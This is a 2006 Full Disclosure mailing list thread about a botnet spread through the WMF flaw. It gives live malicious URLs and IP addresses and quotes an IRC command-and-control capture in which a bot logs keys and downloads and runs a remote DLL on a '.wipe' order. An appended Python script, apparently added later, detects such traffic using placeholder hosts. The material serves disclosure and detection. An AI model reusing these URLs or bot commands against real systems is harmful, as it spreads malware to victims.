Full Disclosure mailing list archives
Re: Possible large botnet
From: <obnoxious () hush com>
Date: Fri, 20 Jan 2006 08:57:50 -0500
I don't necessarily think whoever was infected was infected via viewing this site:

http://php.tjit.or.kr/ppp/log/sent.txt

Lists a slew of email addresses to which whoever "could have" sent bogus messages to possibly infect (l)users.

On Fri, 20 Jan 2006 01:35:45 -0500 Pablo Esterban <pablo_esterban () hotmail com> wrote:

> Seems to be a botnet forming with the help of exploiting the recent WMF flaw on the following site. AFAIK malware/adware is referencing this.
>
> ************D O N O T C L I C K************
> http://213.17.233.194/mediabar.wmf
> http://213.17.233.194/stat_s3.php
> http://213.17.233.194/stat.html
> ************D O N O T C L I C K************
>
> This injects a trojan connecting to 219.240.142.59 on port 44234.
>
> 44234/tcp open irc       Unreal ircd
> 47292/tcp open irc       Unreal ircd
> 47296/tcp open irc       Unreal ircd
> 54729/tcp open irc-proxy psyBNC 2.3.1
>
> Channel stats list around 500 bots and around 1200 connected (may or may not be accurate); however, if you poke around you will find http://219.240.142.59/usage/, containing some interesting links and info about when this most likely started.
>
> The tcp stream below demos the login, and calling of http://219.240.142.59/ppp/mediax.dll. Stats for January list close to 90k hits on this particular file(!).
>
> NICK *****
> USER plnaehe 0 0 :*****
> :irc.foonet.com NOTICE AUTH :*** Looking up your hostname...
> :irc.foonet.com NOTICE AUTH :*** Found your hostname
> :irc.foonet.com 001 *****:Welcome to the ROXnet IRC Network *****
> :irc.foonet.com 002 *****:Your host is irc.foonet.com, running version Unreal3.2.3
> :irc.foonet.com 003 *****:This server was created Thu Oct 13 2005 at 17:25:57 KST
> :irc.foonet.com 005 *****SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 WALLCHOPS WATCH=128 :are supported by this server
> :irc.foonet.com 005 *****SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(ohv)@%+ CHANMODES=beIqa,kfL,lj,psmntirRcOAQKVGCuzNSMTG NETWORK=ROXnet CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=@%+ EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server
> :irc.foonet.com 251 *****:There are 1 users and 1194 invisible on 1 servers
> :irc.foonet.com 252 *****1 :operator(s) online
> :irc.foonet.com 253 *****201 :unknown connection(s)
> :irc.foonet.com 254 *****10 :channels formed
> :irc.foonet.com 255 *****:I have 1195 clients and 0 servers
> :irc.foonet.com 265 *****:Current Local Users: 1195 Max: 5529
> :irc.foonet.com 266 *****:Current Global Users: 1195 Max: 1276
> :irc.foonet.com 422 *****:MOTD File is missing
> *****MODE *****:+iwTxd
> USERHOST *****
> :irc.foonet.com 302 *****:*****
> MODE *****-x+B
> JOIN #mrbean5 rowan
> PRIVMSG *****:[KEYLOG]: Key logger active.
> USERHOST *****
> MODE *****-x+B
> JOIN #mrbean5 rowan
> USERHOST *****
> MODE *****-x+B
> JOIN #mrbean5 rowan
> :irc.foonet.com NOTICE *****:BOTMOTD File not found
> *****MODE *****:-x+B
> ***** JOIN :#mrbean5
> :irc.foonet.com 332 *****#mrbean5 :.wipe http://219.240.142.59/ppp/mediax.dll mediax.dll 3
> :irc.foonet.com 333 *****#mrbean5 DDDI 1137401387
> :irc.foonet.com 353 *****@ #mrbean5 *****
> :irc.foonet.com 366 *****#mrbean5 :End of /NAMES list.
> *****PRIVMSG *****:[KEYLOG]: Key logger active.
> :irc.foonet.com 302 *****
> :irc.foonet.com 302 *****
> PRIVMSG #mrbean5 :[DOWNLOAD]: Downloading URL: http://219.240.142.59/ppp/mediax.dll to: mediax.dll.
> :irc.foonet.com 404 *****#mrbean5 :You need voice (+v) (#mrbean5)
> PRIVMSG #mrbean5 :[DOWNLOAD]: Downloaded 214.5 KB to C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\\mediax.dll @ 71.5 KB/sec.
> PRIVMSG #mrbean5 :[DOWNLOAD]: Opened: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\\mediax.dll.
> :irc.foonet.com 404 *****#mrbean5 :You need voice (+v) (#mrbean5)
> :irc.foonet.com 404 *****#mrbean5 :You need voice (+v) (#mrbean5)
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
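The quoted capture shows the three things a defender can key on in IRC-based bot traffic: the bot reads its orders from the channel topic (the 332 reply carrying a dot-command and a URL), it reports back with bracketed status tags ([KEYLOG], [DOWNLOAD]) instead of chatting, and it retries a keyed JOIN until it gets in. The script below is an added example, not code from the post or its author: it parses RFC 1459 style lines into prefix/command/params/trailing, applies those three heuristics to a transcript, and pulls out the URLs and dropped-file paths as indicators for blocking or hunting. The sample transcript, its hostnames, channel name, key and URL are constructed stand-ins shaped like the posted capture, not the real ones from the post.

```python
"""Flag IRC bot C2 traffic in a captured transcript (added example, not from the post).

Heuristics are modelled on the posted capture; sample data below is constructed.
"""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Optional

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
PATH_RE = re.compile(r"[A-Za-z]:\\\S+")              # Windows drive paths (C:\...)
STATUS_TAG_RE = re.compile(r"^\[(?P<tag>[A-Z]+)\]:")  # e.g. "[KEYLOG]: ..."


@dataclass
class IrcMessage:
    prefix: Optional[str]
    command: str
    params: list
    trailing: Optional[str]


def parse_irc_line(line: str) -> IrcMessage:
    """Split an RFC 1459 style line into prefix, command, middle params and trailing."""
    line = line.rstrip("\r\n")
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    middle, sep, trailing = line.partition(" :")
    parts = middle.split()
    if not parts:
        raise ValueError("line has no command: %r" % line)
    return IrcMessage(prefix, parts[0].upper(), parts[1:], trailing if sep else None)


@dataclass
class Finding:
    rule: str
    detail: str


def analyse_transcript(text: str) -> list:
    """Run the three heuristics over a transcript; returns one Finding per hit."""
    findings = []
    keyed_joins = Counter()
    for raw in text.splitlines():
        if not raw.strip():
            continue
        msg = parse_irc_line(raw)
        body = msg.trailing or ""
        # Rule 1: RPL_TOPIC (332) whose topic is a dot-command carrying a URL.
        # Bots read their orders from the channel topic as soon as they join.
        if msg.command == "332" and body.startswith(".") and URL_RE.search(body):
            findings.append(Finding("topic-command", body))
        # Rule 2: bracketed status tags in PRIVMSG are bot telemetry, not chat.
        tag = STATUS_TAG_RE.match(body)
        if msg.command == "PRIVMSG" and tag:
            findings.append(Finding("status-report", f"{tag.group('tag')}: {body}"))
        # Rule 3: the client side (no prefix) repeatedly JOINs the same keyed channel.
        if msg.prefix is None and msg.command == "JOIN" and len(msg.params) >= 2:
            keyed_joins[(msg.params[0], msg.params[1])] += 1
    for (chan, _key), n in keyed_joins.items():
        if n > 1:
            findings.append(Finding("join-retry", f"{chan} joined with a key {n} times"))
    return findings


def extract_indicators(findings: list) -> dict:
    """Collect URLs and local file paths from the findings for blocking or hunting."""
    urls, paths = set(), set()
    for f in findings:
        urls.update(u.rstrip(".,") for u in URL_RE.findall(f.detail))
        paths.update(p.rstrip(".,") for p in PATH_RE.findall(f.detail))
    return {"urls": sorted(urls), "paths": sorted(paths)}


# Constructed transcript in the shape of the posted capture; every name is a placeholder.
SAMPLE = """\
NICK bot8213
USER plnaehe 0 0 :bot8213
:irc.c2.example.invalid 001 bot8213 :Welcome to the network bot8213
:irc.c2.example.invalid 422 bot8213 :MOTD File is missing
MODE bot8213 -x+B
JOIN #dropzone secretkey
PRIVMSG operator :[KEYLOG]: Key logger active.
JOIN #dropzone secretkey
JOIN #dropzone secretkey
:bot8213 JOIN :#dropzone
:irc.c2.example.invalid 332 bot8213 #dropzone :.wipe http://c2.example.invalid/ppp/payload.dll payload.dll 3
:irc.c2.example.invalid 366 bot8213 #dropzone :End of /NAMES list.
PRIVMSG #dropzone :[DOWNLOAD]: Downloading URL: http://c2.example.invalid/ppp/payload.dll to: payload.dll.
PRIVMSG #dropzone :[DOWNLOAD]: Downloaded 214.5 KB to C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\payload.dll @ 71.5 KB/sec.
:irc.c2.example.invalid 404 bot8213 #dropzone :You need voice (+v) (#dropzone)
PRIVMSG #dropzone :[DOWNLOAD]: Opened: C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\payload.dll.
"""

if __name__ == "__main__":
    hits = analyse_transcript(SAMPLE)
    for h in hits:
        print(f"{h.rule:14} {h.detail}")
    print(extract_indicators(hits))
```

The parser deliberately splits on the first " :" so that bot messages containing later colons ("[DOWNLOAD]: Downloading URL: http://...") stay intact as the trailing parameter; the rules look only at the trailing text and the command, so they work equally on a pcap-derived stream or on an IRC server's own log.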